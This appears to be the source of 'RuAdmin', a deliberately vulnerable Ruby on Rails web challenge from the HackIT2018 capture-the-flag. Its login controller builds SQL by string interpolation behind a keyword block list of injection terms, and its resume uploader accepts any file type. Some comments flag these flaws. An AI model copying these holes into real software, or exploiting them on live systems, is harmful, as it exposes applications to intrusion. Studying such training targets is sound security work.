3 | # You can use CoffeeScript in this file: http://coffeescript.org/ 4 | -------------------------------------------------------------------------------- /web/RuAdmin/app/assets/stylesheets/application.css: -------------------------------------------------------------------------------- 1 | /* 2 | * This is a manifest file that'll be compiled into application.css, which will include all the files 3 | * listed below. 4 | * 5 | * Any CSS and SCSS file within this directory, lib/assets/stylesheets, vendor/assets/stylesheets, 6 | * or any plugin's vendor/assets/stylesheets directory can be referenced here using a relative path. 7 | * 8 | * You're free to add application-wide styles to this file and they'll appear at the bottom of the 9 | * compiled file so the styles you add here take precedence over styles defined in any other CSS/SCSS 10 | * files in this directory. Styles in this file should be added after the last require_* statement. 11 | * It is generally better to create a new file per style scope. 12 | * 13 | *= require_tree . 14 | *= require_self 15 | */ 16 | -------------------------------------------------------------------------------- /web/RuAdmin/app/assets/stylesheets/resumes.scss: -------------------------------------------------------------------------------- 1 | 2 | // Place all the styles related to the Resumes controller here. 3 | // They will automatically be included in application.css. 4 | // You can use Sass (SCSS) here: http://sass-lang.com/ 5 | @import "bootstrap"; 6 | -------------------------------------------------------------------------------- /web/RuAdmin/app/assets/stylesheets/sessions.scss: -------------------------------------------------------------------------------- 1 | // Place all the styles related to the sessions controller here. 2 | // They will automatically be included in application.css. 
3 | // You can use Sass (SCSS) here: http://sass-lang.com/ 4 | -------------------------------------------------------------------------------- /web/RuAdmin/app/assets/stylesheets/users.scss: -------------------------------------------------------------------------------- 1 | // Place all the styles related to the users controller here. 2 | // They will automatically be included in application.css. 3 | // You can use Sass (SCSS) here: http://sass-lang.com/ 4 | -------------------------------------------------------------------------------- /web/RuAdmin/app/channels/application_cable/channel.rb: -------------------------------------------------------------------------------- 1 | module ApplicationCable 2 | class Channel < ActionCable::Channel::Base 3 | end 4 | end 5 | -------------------------------------------------------------------------------- /web/RuAdmin/app/channels/application_cable/connection.rb: -------------------------------------------------------------------------------- 1 | module ApplicationCable 2 | class Connection < ActionCable::Connection::Base 3 | end 4 | end 5 | -------------------------------------------------------------------------------- /web/RuAdmin/app/controllers/application_controller.rb: -------------------------------------------------------------------------------- 1 | class ApplicationController < ActionController::Base 2 | protect_from_forgery with: :exception 3 | end 4 | -------------------------------------------------------------------------------- /web/RuAdmin/app/controllers/concerns/.keep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DefConUA/HackIT2018/5ad9717c539bb252ab11a852e9971444b0d42490/web/RuAdmin/app/controllers/concerns/.keep -------------------------------------------------------------------------------- /web/RuAdmin/app/controllers/home_controller.rb: -------------------------------------------------------------------------------- 1 | class 
HomeController < ApplicationController 2 | 3 | def index 4 | if session[:user_logged_in] 5 | render "index" 6 | else 7 | redirect_to login_url 8 | end 9 | end 10 | 11 | end 12 | -------------------------------------------------------------------------------- /web/RuAdmin/app/controllers/resumes_controller.rb: -------------------------------------------------------------------------------- 1 | class ResumesController < ApplicationController 2 | before_filter :beforeFilter 3 | 4 | def beforeFilter 5 | $request = request 6 | end 7 | def index 8 | if session[:admin] 9 | require 'digest' 10 | digest = Digest::SHA256.hexdigest $request.remote_ip + $request.remote_ip 11 | @resumes = Dir.glob("uploads/resumes/#{digest}/*").map(&File.method(:realpath)); 12 | else 13 | redirect_to login_url 14 | end 15 | end 16 | 17 | def new 18 | if session[:admin] 19 | @resume = Resume.new 20 | else 21 | redirect_to login_url 22 | end 23 | end 24 | 25 | def create 26 | if session[:admin] 27 | @resume = Resume.new(resume_params) 28 | 29 | if @resume.save 30 | redirect_to resumes_path, notice: "Your resume has been uploaded! :)." 31 | else 32 | render "new" 33 | end 34 | else 35 | redirect_to login_url 36 | end 37 | 38 | end 39 | 40 | def destroy 41 | if session[:admin] 42 | @resume = Resume.find(params[:id]) 43 | @resume.destroy 44 | redirect_to resumes_path, notice: "The resume #{@resume.name} has been deleted." 
45 | else 46 | redirect_to login_url 47 | end 48 | end 49 | 50 | private 51 | def resume_params 52 | params.require(:resume).permit(:name, :attachment) 53 | end 54 | 55 | 56 | end 57 | -------------------------------------------------------------------------------- /web/RuAdmin/app/controllers/sessions_controller.rb: -------------------------------------------------------------------------------- 1 | class SessionsController < ApplicationController 2 | #protect_from_forgery with: :null_session 3 | def create 4 | if params[:password] != nil and params[:username] != nil 5 | p = params[:password] 6 | u = params[:username] 7 | hack = /union|benchmark|strcmp|locate|STRCMP|position|file|concat|sleep|md5|mid|sub|count|and|left|load|space|instr|pad|conv|right|ascii|cast|reverse|locate|glob|having|like|match|char|regexp|limit|order|group|hex|information/i 8 | if u =~ hack or p =~ hack 9 | flash[:warning] = "hacking detected" 10 | flash[:danger] = "" 11 | render :new 12 | return 13 | end 14 | 15 | user = User.find_by_sql "SELECT * from users where username='#{u}' and password='#{p}' LIMIT 1" 16 | if user.length != 0 17 | session[:user_logged_in] = 1 18 | redirect_to home_url 19 | else 20 | flash[:warning] = "" 21 | flash[:danger] = "username or password is invalid" 22 | render :new 23 | return 24 | end 25 | else 26 | render :new 27 | end 28 | end 29 | 30 | def admin 31 | if params[:password] != nil and params[:username] != nil 32 | p = params[:password] 33 | u = params[:username] 34 | end 35 | 36 | user = User.find_by(username: u, password: p, isadmin:1) 37 | if user 38 | session[:admin] = 1 39 | redirect_to upload_url 40 | return 41 | else 42 | flash[:warning] = "" 43 | flash[:danger] = "username or password is invalid" 44 | render :admin 45 | return 46 | end 47 | 48 | end 49 | 50 | 51 | 52 | def destroy 53 | session.clear 54 | redirect_to login_url 55 | end 56 | end 57 | -------------------------------------------------------------------------------- 
/web/RuAdmin/app/helpers/application_helper.rb: -------------------------------------------------------------------------------- 1 | module ApplicationHelper 2 | end 3 | -------------------------------------------------------------------------------- /web/RuAdmin/app/helpers/resumes_helper.rb: -------------------------------------------------------------------------------- 1 | module ResumesHelper 2 | end 3 | -------------------------------------------------------------------------------- /web/RuAdmin/app/helpers/sessions_helper.rb: -------------------------------------------------------------------------------- 1 | module SessionsHelper 2 | end 3 | -------------------------------------------------------------------------------- /web/RuAdmin/app/helpers/users_helper.rb: -------------------------------------------------------------------------------- 1 | module UsersHelper 2 | end 3 | -------------------------------------------------------------------------------- /web/RuAdmin/app/jobs/application_job.rb: -------------------------------------------------------------------------------- 1 | class ApplicationJob < ActiveJob::Base 2 | end 3 | -------------------------------------------------------------------------------- /web/RuAdmin/app/mailers/application_mailer.rb: -------------------------------------------------------------------------------- 1 | class ApplicationMailer < ActionMailer::Base 2 | default from: 'from@example.com' 3 | layout 'mailer' 4 | end 5 | -------------------------------------------------------------------------------- /web/RuAdmin/app/models/application_record.rb: -------------------------------------------------------------------------------- 1 | class ApplicationRecord < ActiveRecord::Base 2 | self.abstract_class = true 3 | end 4 | -------------------------------------------------------------------------------- /web/RuAdmin/app/models/concerns/.keep: -------------------------------------------------------------------------------- 
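https://raw.githubusercontent.com/DefConUA/HackIT2018/5ad9717c539bb252ab11a852e9971444b0d42490/web/RuAdmin/app/models/concerns/.keep
--------------------------------------------------------------------------------
/web/RuAdmin/app/models/resume.rb:
--------------------------------------------------------------------------------
# A resume record with a file attached through CarrierWave.
class Resume < ApplicationRecord
  mount_uploader :attachment, AttachmentUploader # Tells rails to use this uploader for this model.
  # Runs the size check when `resume?` is truthy.
  # NOTE(review): the uploader is mounted on :attachment, while this check
  # reads `resume` / `resume?`. Confirm a `resume` attribute exists, otherwise
  # the check should probably read `attachment`.
  validate :resume_size_validation, :if => "resume?"

  # Adds a validation error when the file is larger than the limit.
  # NOTE(review): the message says 5MB but the limit enforced here is
  # 2.megabytes; the upload form also advertises 5.megabytes. Align the three.
  def resume_size_validation
    errors[:resume] << "should be less than 5MB" if resume.size > 2.megabytes
  end
end
--------------------------------------------------------------------------------
/web/RuAdmin/app/models/user.rb:
--------------------------------------------------------------------------------
class User < ApplicationRecord
end
--------------------------------------------------------------------------------
/web/RuAdmin/app/uploaders/attachment_uploader.rb:
--------------------------------------------------------------------------------


# CarrierWave uploader for Resume#attachment, using local file storage.
#
# NOTE(review): no extension allowlist, content-type check or filename
# override is active (the templates below are all commented out), so the
# original filename and type are stored as submitted. Enable an allowlist
# suited to resumes before exposing this outside a lab.
class AttachmentUploader < CarrierWave::Uploader::Base
  require 'securerandom'
  require 'fileutils'
  # Include RMagick or MiniMagick support:
  # include CarrierWave::RMagick
  # include CarrierWave::MiniMagick

  # Choose what kind of storage to use for this uploader:
  storage :file
  # storage :fog

  # Override the directory where uploaded files will be stored.
  # This is a sensible default for uploaders that are meant to be mounted:

  # Returns the per-client upload directory and makes sure it exists.
  #
  # The directory name is SHA-256 over the client IP string concatenated with
  # itself, read from the $request global that ResumesController sets.
  # NOTE(review): $request is process-wide; with a threaded server another
  # request may replace it before this method runs. It is also nil when the
  # uploader is used outside that controller.
  # NOTE(review): this accessor has side effects (mkdir/chmod) each time it is
  # called.
  def store_dir
    #uuid = SecureRandom.uuid
    require 'digest'
    remoteip = Digest::SHA256.hexdigest $request.remote_ip + $request.remote_ip
    upload_dir = "uploads/resumes/#{remoteip}"
    FileUtils::mkdir_p "#{upload_dir}/"
    # Owner-writable only: the original 0777 let every local account add or
    # replace files in the upload directory.
    FileUtils::chmod 0755, upload_dir
    # Presumably resolved by CarrierWave against its root directory, which is
    # why the returned path has a leading "../"; verify against the config.
    "../#{upload_dir}"
  end

  # Provide a default URL as a default if there hasn't been a file uploaded:
  # def default_url(*args)
  #   # For Rails 3.1+ asset pipeline compatibility:
  #   # ActionController::Base.helpers.asset_path("fallback/" + [version_name, "default.png"].compact.join('_'))
  #
  #   "/images/fallback/" + [version_name, "default.png"].compact.join('_')
  # end

  # Process files as they are uploaded:
  # process scale: [200, 300]
  #
  # def scale(width, height)
  #   # do something
  # end

  # Create different versions of your uploaded files:
  # version :thumb do
  #   process resize_to_fit: [50, 50]
  # end

  # Add a white list of extensions which are allowed to be uploaded.
  # For images you might use something like this:
  # def extension_whitelist
  #   %w(jpg jpeg gif png)
  # end

  # Override the filename of the uploaded files:
  # Avoid using model.id or version_name here, see uploader/store.rb for details.
  # def filename
  #   "something.jpg" if original_filename
  # end
end
--------------------------------------------------------------------------------
/web/RuAdmin/app/views/home/index.html.erb:
--------------------------------------------------------------------------------
1 | 2 | 3 | 4 | logout 5 |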
6 |

Hello, Regular User!

7 |

As you can see your privilege is pretty useless

8 |
9 |

If you want some 1337 features, maybe get admin privilege.

10 | Try it 11 |
12 | 13 | 14 | -------------------------------------------------------------------------------- /web/RuAdmin/app/views/layouts/application.html.erb: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Testapp 5 | <%= csrf_meta_tags %> 6 | 7 | <%= stylesheet_link_tag 'application', media: 'all', 'data-turbolinks-track': 'reload' %> 8 | <%= javascript_include_tag 'application', 'data-turbolinks-track': 'reload' %> 9 | 10 | <% if flash[:error].present? %> 11 |

<%= flash[:error] %>

12 | <% end %> 13 | <% if flash[:notice].present? %> 14 |

<%= flash[:notice] %>

15 | <% end %> 16 | 17 | <%= yield %> 18 | 19 | 20 | -------------------------------------------------------------------------------- /web/RuAdmin/app/views/layouts/mailer.html.erb: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 8 | 9 | 10 | 11 | <%= yield %> 12 | 13 | 14 | -------------------------------------------------------------------------------- /web/RuAdmin/app/views/layouts/mailer.text.erb: -------------------------------------------------------------------------------- 1 | <%= yield %> 2 | -------------------------------------------------------------------------------- /web/RuAdmin/app/views/resumes/create.html.erb: -------------------------------------------------------------------------------- 1 |

Resumes#create

2 |

Find me in app/views/resumes/create.html.erb

3 | -------------------------------------------------------------------------------- /web/RuAdmin/app/views/resumes/destroy.html.erb: -------------------------------------------------------------------------------- 1 |

Resumes#destroy

2 |

Find me in app/views/resumes/destroy.html.erb

3 | -------------------------------------------------------------------------------- /web/RuAdmin/app/views/resumes/index.html.erb: -------------------------------------------------------------------------------- 1 | <% if !flash[:notice].blank? %> 2 |
3 | <%= flash[:notice] %> 4 |
5 | <% end %> 6 | 7 |
8 | 9 | <%= link_to "New Resume", new_resume_path, class: "btn btn-primary" %> 10 | <%= link_to "logout", logout_path, class: "btn btn-primary" %> 11 |
12 |
13 | 14 | 15 | . 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | <% @resumes.each_with_index do |path,idx| %> 25 | 26 | 27 | 28 | 29 | 30 | 31 | <% end %> 32 | 33 | 34 |
IndexFull Path
<%= idx %><%= path %>
35 | -------------------------------------------------------------------------------- /web/RuAdmin/app/views/resumes/new.html.erb: -------------------------------------------------------------------------------- 1 | <% if !@resume.errors.empty? %> 2 |
3 | 4 | 9 | 10 |
11 | <% end %> 12 | 13 |
14 | <%= form_for @resume, html: { multipart: true } do |f| %> 15 | <%= f.label :name %> 16 | <%= f.text_field :name %> 17 | <%= f.label :attachment %> 18 | <%= f.file_field :attachment, onchange: "validateFiles(this);", 19 | data: { max_file_size: 5.megabytes } %> 20 | <%= f.submit "Save", class: "btn btn-primary" %> 21 | <% end %> 22 |
23 | -------------------------------------------------------------------------------- /web/RuAdmin/app/views/sessions/admin.html.erb: -------------------------------------------------------------------------------- 1 |
2 | Admin Login 3 |
4 | 5 |
6 |
7 |
8 | <%= form_tag admin_path do %> 9 |
10 | <%= label_tag :username %>
11 | <%= text_field_tag :username, params[:username] %> 12 |
13 |
14 | <%= label_tag :password %>
15 | <%= password_field_tag :password %> 16 |
17 |
<%= submit_tag "Log In" %>
19 |
20 | <% flash.each do |key, value| %> 21 |
<%= value %>
22 | <% end %> 23 | <% end %> 24 | 25 |
26 |
27 | 28 | -------------------------------------------------------------------------------- /web/RuAdmin/app/views/sessions/new.html.erb: -------------------------------------------------------------------------------- 1 |
2 | User Login 3 |
4 | 5 |
6 |
7 |
8 | <%= form_tag sessions_path do %> 9 |
10 | <%= label_tag :username %>
11 | <%= text_field_tag :username, params[:username] %> 12 |
13 |
14 | <%= label_tag :password %>
15 | <%= password_field_tag :password %> 16 |
17 |
<%= submit_tag "Log In" %>
19 |
20 | <% flash.each do |key, value| %> 21 |
<%= value %>
22 | <% end %> 23 | <% end %> 24 | 25 |
26 |
27 | 28 | -------------------------------------------------------------------------------- /web/RuAdmin/bin/bundle: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | ENV['BUNDLE_GEMFILE'] ||= File.expand_path('../../Gemfile', __FILE__) 3 | load Gem.bin_path('bundler', 'bundle') 4 | -------------------------------------------------------------------------------- /web/RuAdmin/bin/rails: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | begin 3 | load File.expand_path('../spring', __FILE__) 4 | rescue LoadError => e 5 | raise unless e.message.include?('spring') 6 | end 7 | APP_PATH = File.expand_path('../config/application', __dir__) 8 | require_relative '../config/boot' 9 | require 'rails/commands' 10 | -------------------------------------------------------------------------------- /web/RuAdmin/bin/rake: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | begin 3 | load File.expand_path('../spring', __FILE__) 4 | rescue LoadError => e 5 | raise unless e.message.include?('spring') 6 | end 7 | require_relative '../config/boot' 8 | require 'rake' 9 | Rake.application.run 10 | -------------------------------------------------------------------------------- /web/RuAdmin/bin/setup: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | require 'pathname' 3 | require 'fileutils' 4 | include FileUtils 5 | 6 | # path to your application root. 7 | APP_ROOT = Pathname.new File.expand_path('../../', __FILE__) 8 | 9 | def system!(*args) 10 | system(*args) || abort("\n== Command #{args} failed ==") 11 | end 12 | 13 | chdir APP_ROOT do 14 | # This script is a starting point to setup your application. 15 | # Add necessary setup steps to this file. 16 | 17 | puts '== Installing dependencies ==' 18 | system! 
'gem install bundler --conservative' 19 | system('bundle check') || system!('bundle install') 20 | 21 | # puts "\n== Copying sample files ==" 22 | # unless File.exist?('config/database.yml') 23 | # cp 'config/database.yml.sample', 'config/database.yml' 24 | # end 25 | 26 | puts "\n== Preparing database ==" 27 | system! 'bin/rails db:setup' 28 | 29 | puts "\n== Removing old logs and tempfiles ==" 30 | system! 'bin/rails log:clear tmp:clear' 31 | 32 | puts "\n== Restarting application server ==" 33 | system! 'bin/rails restart' 34 | end 35 | -------------------------------------------------------------------------------- /web/RuAdmin/bin/spring: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | 3 | # This file loads spring without using Bundler, in order to be fast. 4 | # It gets overwritten when you run the `spring binstub` command. 5 | 6 | unless defined?(Spring) 7 | require 'rubygems' 8 | require 'bundler' 9 | 10 | lockfile = Bundler::LockfileParser.new(Bundler.default_lockfile.read) 11 | spring = lockfile.specs.detect { |spec| spec.name == "spring" } 12 | if spring 13 | Gem.use_paths Gem.dir, Bundler.bundle_path.to_s, *Gem.path 14 | gem 'spring', spring.version 15 | require 'spring/binstub' 16 | end 17 | end 18 | -------------------------------------------------------------------------------- /web/RuAdmin/bin/update: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | require 'pathname' 3 | require 'fileutils' 4 | include FileUtils 5 | 6 | # path to your application root. 7 | APP_ROOT = Pathname.new File.expand_path('../../', __FILE__) 8 | 9 | def system!(*args) 10 | system(*args) || abort("\n== Command #{args} failed ==") 11 | end 12 | 13 | chdir APP_ROOT do 14 | # This script is a way to update your development environment automatically. 15 | # Add necessary update steps to this file. 16 | 17 | puts '== Installing dependencies ==' 18 | system! 
'gem install bundler --conservative' 19 | system('bundle check') || system!('bundle install') 20 | 21 | puts "\n== Updating database ==" 22 | system! 'bin/rails db:migrate' 23 | 24 | puts "\n== Removing old logs and tempfiles ==" 25 | system! 'bin/rails log:clear tmp:clear' 26 | 27 | puts "\n== Restarting application server ==" 28 | system! 'bin/rails restart' 29 | end 30 | -------------------------------------------------------------------------------- /web/RuAdmin/config.ru: -------------------------------------------------------------------------------- 1 | # This file is used by Rack-based servers to start the application. 2 | 3 | require_relative 'config/environment' 4 | 5 | run Rails.application 6 | -------------------------------------------------------------------------------- /web/RuAdmin/config/application.rb: -------------------------------------------------------------------------------- 1 | require_relative 'boot' 2 | 3 | require 'rails/all' 4 | 5 | # Require the gems listed in Gemfile, including any gems 6 | # you've limited to :test, :development, or :production. 7 | Bundler.require(*Rails.groups) 8 | 9 | module Testapp 10 | class Application < Rails::Application 11 | # Settings in config/environments/* take precedence over those specified here. 12 | # Application configuration should go into files in config/initializers 13 | # -- all .rb files in that directory are automatically loaded. 14 | end 15 | end 16 | -------------------------------------------------------------------------------- /web/RuAdmin/config/boot.rb: -------------------------------------------------------------------------------- 1 | ENV['BUNDLE_GEMFILE'] ||= File.expand_path('../Gemfile', __dir__) 2 | 3 | require 'bundler/setup' # Set up gems listed in the Gemfile. 
4 | -------------------------------------------------------------------------------- /web/RuAdmin/config/cable.yml: -------------------------------------------------------------------------------- 1 | development: 2 | adapter: async 3 | 4 | test: 5 | adapter: async 6 | 7 | production: 8 | adapter: redis 9 | url: redis://localhost:6379/1 10 | -------------------------------------------------------------------------------- /web/RuAdmin/config/database.yml: -------------------------------------------------------------------------------- 1 | # MySQL. Versions 5.0 and up are supported. 2 | # 3 | # Install the MySQL driver 4 | # gem install mysql2 5 | # 6 | # Ensure the MySQL gem is defined in your Gemfile 7 | # gem 'mysql2' 8 | # 9 | # And be sure to use new-style password hashing: 10 | # http://dev.mysql.com/doc/refman/5.7/en/old-client.html 11 | # 12 | default: &default 13 | adapter: mysql2 14 | encoding: utf8 15 | pool: 5 16 | username: #### 17 | password: #### 18 | socket: /var/run/mysqld/mysqld.sock 19 | 20 | development: 21 | <<: *default 22 | database: ####_development 23 | 24 | # Warning: The database defined as "test" will be erased and 25 | # re-generated from your development database when you run "rake". 26 | # Do not set this db to the same as development or production. 27 | test: 28 | <<: *default 29 | database: ###_test 30 | 31 | # As with config/secrets.yml, you never want to store sensitive information, 32 | # like your database password, in your source code. If your source code is 33 | # ever seen by anyone, they now have access to your database. 34 | # 35 | # Instead, provide the password as a unix environment variable when you boot 36 | # the app. Read http://guides.rubyonrails.org/configuring.html#configuring-a-database 37 | # for a full rundown on how to provide these environment variables in a 38 | # production deployment. 
39 | # 40 | # On Heroku and other platform providers, you may have a full connection URL 41 | # available as an environment variable. For example: 42 | # 43 | # DATABASE_URL="mysql2://myuser:mypass@localhost/somedatabase" 44 | # 45 | # You can use this database configuration with: 46 | # 47 | # production: 48 | # url: <%= ENV['DATABASE_URL'] %> 49 | # 50 | production: 51 | <<: *default 52 | database: ###_development 53 | username: ### 54 | password: 55 | -------------------------------------------------------------------------------- /web/RuAdmin/config/environment.rb: -------------------------------------------------------------------------------- 1 | # Load the Rails application. 2 | require_relative 'application' 3 | 4 | # Initialize the Rails application. 5 | Rails.application.initialize! 6 | -------------------------------------------------------------------------------- /web/RuAdmin/config/environments/development.rb: -------------------------------------------------------------------------------- 1 | Rails.application.configure do 2 | # Settings specified here will take precedence over those in config/application.rb. 3 | 4 | # In the development environment your application's code is reloaded on 5 | # every request. This slows down response time but is perfect for development 6 | # since you don't have to restart the web server when you make code changes. 7 | config.cache_classes = false 8 | 9 | # Do not eager load code on boot. 10 | config.eager_load = false 11 | 12 | # Show full error reports. 13 | config.consider_all_requests_local = true 14 | 15 | # Enable/disable caching. By default caching is disabled. 16 | if Rails.root.join('tmp/caching-dev.txt').exist? 
17 | config.action_controller.perform_caching = true 18 | 19 | config.cache_store = :memory_store 20 | config.public_file_server.headers = { 21 | 'Cache-Control' => 'public, max-age=172800' 22 | } 23 | else 24 | config.action_controller.perform_caching = false 25 | 26 | config.cache_store = :null_store 27 | end 28 | 29 | # Don't care if the mailer can't send. 30 | config.action_mailer.raise_delivery_errors = false 31 | 32 | config.action_mailer.perform_caching = false 33 | 34 | # Print deprecation notices to the Rails logger. 35 | config.active_support.deprecation = :log 36 | 37 | # Raise an error on page load if there are pending migrations. 38 | config.active_record.migration_error = :page_load 39 | 40 | # Debug mode disables concatenation and preprocessing of assets. 41 | # This option may cause significant delays in view rendering with a large 42 | # number of complex assets. 43 | config.assets.debug = true 44 | 45 | # Suppress logger output for asset requests. 46 | config.assets.quiet = true 47 | 48 | # Raises error for missing translations 49 | # config.action_view.raise_on_missing_translations = true 50 | 51 | # Use an evented file watcher to asynchronously detect changes in source code, 52 | # routes, locales, etc. This feature depends on the listen gem. 53 | config.file_watcher = ActiveSupport::EventedFileUpdateChecker 54 | end 55 | -------------------------------------------------------------------------------- /web/RuAdmin/config/environments/production.rb: -------------------------------------------------------------------------------- 1 | Rails.application.configure do 2 | # Settings specified here will take precedence over those in config/application.rb. 3 | 4 | # Code is not reloaded between requests. 5 | config.cache_classes = true 6 | 7 | # Eager load code on boot. This eager loads most of Rails and 8 | # your application in memory, allowing both threaded web servers 9 | # and those relying on copy on write to perform better. 
10 | # Rake tasks automatically ignore this option for performance. 11 | config.eager_load = true 12 | 13 | # Full error reports are disabled and caching is turned on. 14 | config.consider_all_requests_local = false 15 | config.action_controller.perform_caching = true 16 | 17 | # Disable serving static files from the `/public` folder by default since 18 | # Apache or NGINX already handles this. 19 | config.public_file_server.enabled = ENV['RAILS_SERVE_STATIC_FILES'].present? 20 | 21 | # Compress JavaScripts and CSS. 22 | config.assets.js_compressor = :uglifier 23 | # config.assets.css_compressor = :sass 24 | 25 | # Fall back to the assets pipeline if a precompiled asset is missed (compile is set to true here). 26 | config.assets.compile = true 27 | 28 | # `config.assets.precompile` and `config.assets.version` have moved to config/initializers/assets.rb 29 | 30 | # Enable serving of images, stylesheets, and JavaScripts from an asset server. 31 | # config.action_controller.asset_host = 'http://assets.example.com' 32 | 33 | # Specifies the header that your server uses for sending files. 34 | # config.action_dispatch.x_sendfile_header = 'X-Sendfile' # for Apache 35 | # config.action_dispatch.x_sendfile_header = 'X-Accel-Redirect' # for NGINX 36 | 37 | # Mount Action Cable outside main process or domain 38 | # config.action_cable.mount_path = nil 39 | # config.action_cable.url = 'wss://example.com/cable' 40 | # config.action_cable.allowed_request_origins = [ 'http://example.com', /http:\/\/example.*/ ] 41 | 42 | # Force all access to the app over SSL, use Strict-Transport-Security, and use secure cookies. 43 | # config.force_ssl = true 44 | 45 | # Use the lowest log level to ensure availability of diagnostic information 46 | # when problems arise. 47 | config.log_level = :debug 48 | 49 | # Prepend all log lines with the following tags. 50 | config.log_tags = [ :request_id ] 51 | 52 | # Use a different cache store in production.
53 | # config.cache_store = :mem_cache_store 54 | 55 | # Use a real queuing backend for Active Job (and separate queues per environment) 56 | # config.active_job.queue_adapter = :resque 57 | # config.active_job.queue_name_prefix = "testapp_#{Rails.env}" 58 | config.action_mailer.perform_caching = false 59 | 60 | # Ignore bad email addresses and do not raise email delivery errors. 61 | # Set this to true and configure the email server for immediate delivery to raise delivery errors. 62 | # config.action_mailer.raise_delivery_errors = false 63 | 64 | # Enable locale fallbacks for I18n (makes lookups for any locale fall back to 65 | # the I18n.default_locale when a translation cannot be found). 66 | config.i18n.fallbacks = true 67 | 68 | # Send deprecation notices to registered listeners. 69 | config.active_support.deprecation = :notify 70 | 71 | # Use default logging formatter so that PID and timestamp are not suppressed. 72 | config.log_formatter = ::Logger::Formatter.new 73 | 74 | # Use a different logger for distributed setups. 75 | # require 'syslog/logger' 76 | # config.logger = ActiveSupport::TaggedLogging.new(Syslog::Logger.new 'app-name') 77 | 78 | if ENV["RAILS_LOG_TO_STDOUT"].present? 79 | logger = ActiveSupport::Logger.new(STDOUT) 80 | logger.formatter = config.log_formatter 81 | config.logger = ActiveSupport::TaggedLogging.new(logger) 82 | end 83 | 84 | # Do not dump schema after migrations. 85 | config.active_record.dump_schema_after_migration = false 86 | end 87 | -------------------------------------------------------------------------------- /web/RuAdmin/config/environments/test.rb: -------------------------------------------------------------------------------- 1 | Rails.application.configure do 2 | # Settings specified here will take precedence over those in config/application.rb. 3 | 4 | # The test environment is used exclusively to run your application's 5 | # test suite. You never need to work with it otherwise. 
Remember that 6 | # your test database is "scratch space" for the test suite and is wiped 7 | # and recreated between test runs. Don't rely on the data there! 8 | config.cache_classes = true 9 | 10 | # Do not eager load code on boot. This avoids loading your whole application 11 | # just for the purpose of running a single test. If you are using a tool that 12 | # preloads Rails for running tests, you may have to set it to true. 13 | config.eager_load = false 14 | 15 | # Configure public file server for tests with Cache-Control for performance. 16 | config.public_file_server.enabled = true 17 | config.public_file_server.headers = { 18 | 'Cache-Control' => 'public, max-age=3600' 19 | } 20 | 21 | # Show full error reports and disable caching. 22 | config.consider_all_requests_local = true 23 | config.action_controller.perform_caching = false 24 | 25 | # Raise exceptions instead of rendering exception templates. 26 | config.action_dispatch.show_exceptions = false 27 | 28 | # Disable request forgery protection in test environment. 29 | config.action_controller.allow_forgery_protection = false 30 | config.action_mailer.perform_caching = false 31 | 32 | # Tell Action Mailer not to deliver emails to the real world. 33 | # The :test delivery method accumulates sent emails in the 34 | # ActionMailer::Base.deliveries array. 35 | config.action_mailer.delivery_method = :test 36 | 37 | # Print deprecation notices to the stderr. 38 | config.active_support.deprecation = :stderr 39 | 40 | # Raises error for missing translations 41 | # config.action_view.raise_on_missing_translations = true 42 | end 43 | -------------------------------------------------------------------------------- /web/RuAdmin/config/initializers/application_controller_renderer.rb: -------------------------------------------------------------------------------- 1 | # Be sure to restart your server when you modify this file. 
2 | 3 | # ActiveSupport::Reloader.to_prepare do 4 | # ApplicationController.renderer.defaults.merge!( 5 | # http_host: 'example.org', 6 | # https: false 7 | # ) 8 | # end 9 | -------------------------------------------------------------------------------- /web/RuAdmin/config/initializers/assets.rb: -------------------------------------------------------------------------------- 1 | # Be sure to restart your server when you modify this file. 2 | 3 | # Version of your assets, change this if you want to expire all your assets. 4 | Rails.application.config.assets.version = '1.0' 5 | 6 | # Add additional assets to the asset load path 7 | # Rails.application.config.assets.paths << Emoji.images_path 8 | 9 | # Precompile additional assets. 10 | # application.js, application.css, and all non-JS/CSS in app/assets folder are already added. 11 | # Rails.application.config.assets.precompile += %w( search.js ) 12 | -------------------------------------------------------------------------------- /web/RuAdmin/config/initializers/backtrace_silencers.rb: -------------------------------------------------------------------------------- 1 | # Be sure to restart your server when you modify this file. 2 | 3 | # You can add backtrace silencers for libraries that you're using but don't wish to see in your backtraces. 4 | # Rails.backtrace_cleaner.add_silencer { |line| line =~ /my_noisy_library/ } 5 | 6 | # You can also remove all the silencers if you're trying to debug a problem that might stem from framework code. 7 | # Rails.backtrace_cleaner.remove_silencers! 8 | -------------------------------------------------------------------------------- /web/RuAdmin/config/initializers/cookies_serializer.rb: -------------------------------------------------------------------------------- 1 | # Be sure to restart your server when you modify this file. 2 | 3 | # Specify a serializer for the signed and encrypted cookie jars. 4 | # Valid options are :json, :marshal, and :hybrid. 
5 | Rails.application.config.action_dispatch.cookies_serializer = :json 6 | -------------------------------------------------------------------------------- /web/RuAdmin/config/initializers/filter_parameter_logging.rb: -------------------------------------------------------------------------------- 1 | # Be sure to restart your server when you modify this file. 2 | 3 | # Configure sensitive parameters which will be filtered from the log file. 4 | Rails.application.config.filter_parameters += [:password] 5 | -------------------------------------------------------------------------------- /web/RuAdmin/config/initializers/inflections.rb: -------------------------------------------------------------------------------- 1 | # Be sure to restart your server when you modify this file. 2 | 3 | # Add new inflection rules using the following format. Inflections 4 | # are locale specific, and you may define rules for as many different 5 | # locales as you wish. All of these examples are active by default: 6 | # ActiveSupport::Inflector.inflections(:en) do |inflect| 7 | # inflect.plural /^(ox)$/i, '\1en' 8 | # inflect.singular /^(ox)en/i, '\1' 9 | # inflect.irregular 'person', 'people' 10 | # inflect.uncountable %w( fish sheep ) 11 | # end 12 | 13 | # These inflection rules are supported but not enabled by default: 14 | # ActiveSupport::Inflector.inflections(:en) do |inflect| 15 | # inflect.acronym 'RESTful' 16 | # end 17 | -------------------------------------------------------------------------------- /web/RuAdmin/config/initializers/mime_types.rb: -------------------------------------------------------------------------------- 1 | # Be sure to restart your server when you modify this file. 
